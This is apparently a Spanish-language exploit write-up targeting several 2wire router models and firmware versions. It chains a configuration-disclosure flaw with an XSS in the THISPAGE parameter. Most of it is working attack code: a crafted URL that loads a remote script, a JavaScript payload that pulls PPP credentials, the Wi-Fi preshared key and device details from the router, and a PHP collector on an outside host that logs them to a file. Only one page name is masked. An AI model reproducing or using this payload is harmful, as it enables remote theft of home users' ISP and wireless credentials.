Obtención remota de configuración 2wire 
Por hkm (hkm@hakim.ws) 
 
Modelos vulnerables: 1701HG, 1800HW, 2071HG, 2700HG Gateway *probablemente más 
 
Firmware: v3.17.5, 3.7.1, 4.25.19, 5.29.51 
 
VIDEO: http://www.hakim.ws/2wire/cfgdisc.html 
 
Los routers 2wire poseen una vulnerabilidad que nos permite obtener su archivo de 
configuración, cuando es combinado con un  XSS permite la obtención remota de la 
configuración. 
 
La vulnerabilidad del archivo de configuración o URL Mágico fue publicado por Javier Liendo 
(mirror: http://www.hakim.ws/2wire/urlmagico.txt) y él uso Flash para anti-DNS pinning 
7/08/2007. 
 
La vulnerabilidad de XSS en la variable THISPAGE de la interfaz de configuración web nos 
permite obtener de forma remota y desde otro dominio el archivo de configuración. 
 
 --XSS-- (todo en una línea) 
 
http://192.168.1.254/xslt?PAGE=A05&THISPAGE=</script><script>with(document)body.appendChild(createElement("script")).setAttribute("src","http://www.hakim.ws/2wire/cfgpwn.js");</script><script> 
 
 --cfgpwn.js-- 
try { 
xmlhttp=new ActiveXObject("MSXML2.XMLHTTP"); 
} catch(e) { 
xmlhttp = new XMLHttpRequest() 
} 
xmlhttp.open("GET","/xslt?page=mgmt_***",false); 
xmlhttp.send(null); 
var doc = xmlhttp.responseText; 
 
var ppp = 
doc.substr(doc.indexOf('<PPP_USER>'),doc.indexOf('</PPP_PASS_REAL>')-doc.indexOf('<PPP_USER>')); 
var enc = doc.substr(doc.indexOf('<ARG NAME="essid">'),doc.indexOf('<ARG 
NAME="preshared_key">')-doc.indexOf('<ARG NAME="essid">')); 
var mac = doc.substr(doc.lastIndexOf('<SYSTEM ASSEMBLYNUM'),doc.lastIndexOf('<DEVICE WAVE')-doc.lastIndexOf('<SYSTEM ASSEMBLYNUM')); 
var con = doc.substr(doc.indexOf('<ARG NAME="Access Concentrator">'),55); 
 
document.location="http://www.hakim.ws/blah/cookie.php?"+ppp+enc+mac+con;   
//xD 
 
 --cookie.php-- 
 <?PHP 
 $ip = $_SERVER['REMOTE_ADDR']; 
$referer = $_SERVER['HTTP_REFERER']; 
 $agent = $_SERVER['HTTP_USER_AGENT']; 
 $browser = $_SERVER['HTTP_USER_AGENT']; 
 $id = $_SERVER['QUERY_STRING']; 
 
 $file = fopen("file.txt","a+"); 
 fwrite($file, "\r\n$id\r\n$ip\r\n" . date("Y-m-d H:i:s") . 
"\r\n$agent\r\n$referer\r\n"); 
 fclose($file); 
 flush(); 
 ?> 
  
*** he omitido data para evitar kidz 
 
Greetz a sdc por un xss sin igual, al3x, darko,  crypkey, nitr0us, deadsector, beavis y para la Comunidad Underground de México